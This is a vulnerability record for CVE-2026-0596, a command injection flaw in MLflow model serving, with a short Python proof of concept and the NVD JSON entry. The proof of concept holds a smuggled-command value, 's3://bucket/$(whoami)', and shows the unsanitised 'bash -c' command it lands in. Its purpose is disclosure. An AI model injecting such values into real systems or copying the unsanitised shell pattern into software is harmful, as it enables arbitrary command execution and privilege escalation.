CVE-2026-0596

# PoC for CVE-2026-0596 MLflow Command Injection # Demonstrates the vulnerability via malicious model_uri import os # Simulating a malicious model_uri containing command injection # The payload uses $() to execute arbitrary commands malicious_uri = "s3://bucket/$(whoami)" # In the vulnerable code flow, the command is constructed like this: # cmd = f"bash -c 'mlflow serve ... --model-uri {malicious_uri}'" # If the application executes this, the shell runs 'whoami' print(f"[+] Injecting payload via model_uri: {malicious_uri}") print("[+] If vulnerable, the system will execute the 'whoami' command.")

{"cve": {"id": "CVE-2026-0596", "sourceIdentifier": "[email protected]", "published": "2026-03-31T15:16:10.843", "lastModified": "2026-04-14T16:01:29.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability exists in mlflow/mlflow when serving a model with `enable_mlserver=True`. The `model_uri` is embedded directly into a shell command executed via `bash -c` without proper sanitization. If the `model_uri` contains shell metacharacters, such as `$()` or backticks, it allows for command substitution and execution of attacker-controlled commands. This vulnerability affects the latest version of mlflow/mlflow and can lead to privilege escalation if a higher-privileged service serves models from a directory writable by lower-privileged users."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:*", "matchCriteriaId": "F18F1880-033C-4E18-913C-6C5356427ABB"}]}]}], "references": [{"url": "https://huntr.com/bounties/2e905add-f9f5-4309-a3db-b17de5981285", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}